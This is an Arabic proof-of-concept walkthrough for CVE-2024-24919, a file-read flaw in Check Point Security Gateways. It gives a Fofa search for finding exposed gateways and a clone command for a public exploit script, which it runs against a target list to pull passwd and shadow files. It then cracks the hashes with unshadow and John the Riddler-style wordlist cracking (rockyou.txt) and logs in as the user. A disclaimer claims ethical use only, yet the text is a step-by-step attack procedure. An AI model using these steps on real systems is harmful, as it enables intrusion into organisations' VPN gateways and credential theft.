
إثبات المفهوم - CVE-2024–24919 - Check Point Security Gateways
قد يسمح للمهاجم بقراءة معلومات معينة على بوابات أمان Check Point عند اتصالها بالإنترنت وتمكين شفرات Remote Access VPN أو Mobile Access Software. يتوفر إصلاح أمني يخفف من هذه الثغرة.
اقرأ عنه — CVE-2024-24919
إخلاء مسؤولية: هذا الدليل الإثباتي (POC) مصمم لأغراض تعليمية واختبارية أخلاقية فقط. استخدام هذه الأداة لمهاجمة أهداف دون موافقة متبادلة مسبقة غير قانوني. يتحمل المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والاتحادية المعمول بها. لا يتحمل المطورون أي مسؤولية ولا يكونون مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
للعثور على أهداف محتملة، استخدم Fofa (مشابه لـ Shodan.io):
app=”Check_Point-SSL-Network-Extender”
أولاً، استنسخ المستودع:
git clone https://github.com/verylazytech/CVE-2024-24919
بعد ذلك اختر هدفك وأضفه إلى ملف list.txt بهذا التنسيق:
تشغيل الأداة:
python3 CVE-2024-24919.py -l list.txt
الآن هناك ناتجان محتملان:
غير ناجح:

ناجح:

الآن بعد العثور على ملفي passwd و shadow، يمكنك محاولة كسر التجزئة باستخدام JohnTheRipper. بعد تشغيل الأداة، ستحصل على ملفين passwd و shadow، لذا يمكنك دمجهما في ملف واحد ومحاولة كسرهما (استخدمت rockyou.txt ولكن يمكن أن تكون أي قائمة كلمات مرور):
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

والآن بعد كسر التجزئة، يمكننا تسجيل الدخول إلى المستخدم!